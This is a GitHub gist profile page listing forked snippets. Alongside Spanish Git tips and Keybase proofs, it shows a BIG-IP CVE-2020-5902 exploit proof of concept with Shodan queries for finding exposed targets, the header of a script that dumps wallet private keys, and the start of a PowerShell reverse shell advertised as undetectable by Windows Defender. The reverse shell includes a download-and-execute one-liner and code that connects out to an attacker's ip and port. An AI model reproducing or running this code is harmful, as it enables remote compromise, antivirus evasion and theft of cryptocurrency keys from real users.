Skip to content

Instantly share code, notes, and snippets.

View cbk914's full-sized avatar

cbk914 cbk914

View GitHub Profile
@cbk914
cbk914 / Operaciones-Git
Created June 3, 2018 08:44 — forked from jelcaf/Operaciones-Git
Git Tips - Mini-trucos de Git para facilitarme la tarea
#############################################
# Push de la rama actual
git push origin $rama_actual
#############################################
# Volver a un commit anterior, descartando los cambios
git reset --HARD $SHA1
#############################################
# Ver y descargar Ramas remotas
### Keybase proof
I hereby claim:
* I am cbk914 on github.
* I am cbk914 (https://keybase.io/cbk914) on keybase.
* I have a public key ASCrZPuMYpB1_o-Y2JAbcUupkefOJqWU8Pz-zo2fvUqv6Qo
To claim this, I am signing this object:

Keybase proof

I hereby claim:

  • I am cbk914 on github.
  • I am cbk914 (https://keybase.io/cbk914) on keybase.
  • I have a public key ASCHt5Nu2HQIJHZ99BwFz-ddJNm4TOXbvonO02ay8uFmMgo

To claim this, I am signing this object:

@cbk914
cbk914 / CVE-2020-5902.md
Created July 27, 2020 13:14 — forked from cihanmehmet/CVE-2020-5902.md
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@cbk914
cbk914 / dump_wallet_addresses.py
Created June 1, 2021 20:01 — forked from provegard/dump_wallet_addresses.py
Python script for dumping wallet addresses and private keys
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# Usage:
# ./dump_wallet_addresses.py <wallet binary>
#
@cbk914
cbk914 / Undetectable_reverse_powershell_5-9-22.ps1
Created May 9, 2022 21:57 — forked from guglia001/Undetectable_reverse_powershell_5-9-22.ps1
Powershell reverse shell script undetectable by windows defender
#based on original script by @nikhil_mitt. Change ip and port
#Undetectable on 05/09/2022
# Example IEX(New-Object Net.WebClient).downloadString('http://<ip>/<file>.ps1')
$KLK = New-Object System.Net.Sockets.TCPClient('<ip>','<port>');
$PLP = $KLK.GetStream();
[byte[]]$VVCCA = 0..((2-shl(3*5))-1)|%{0};
$VVCCA = ([text.encoding]::UTF8).GetBytes("Succesfuly connected .`n`n")
$PLP.Write($VVCCA,0,$VVCCA.Length)
$VVCCA = ([text.encoding]::UTF8).GetBytes((Get-Location).Path + ' > ')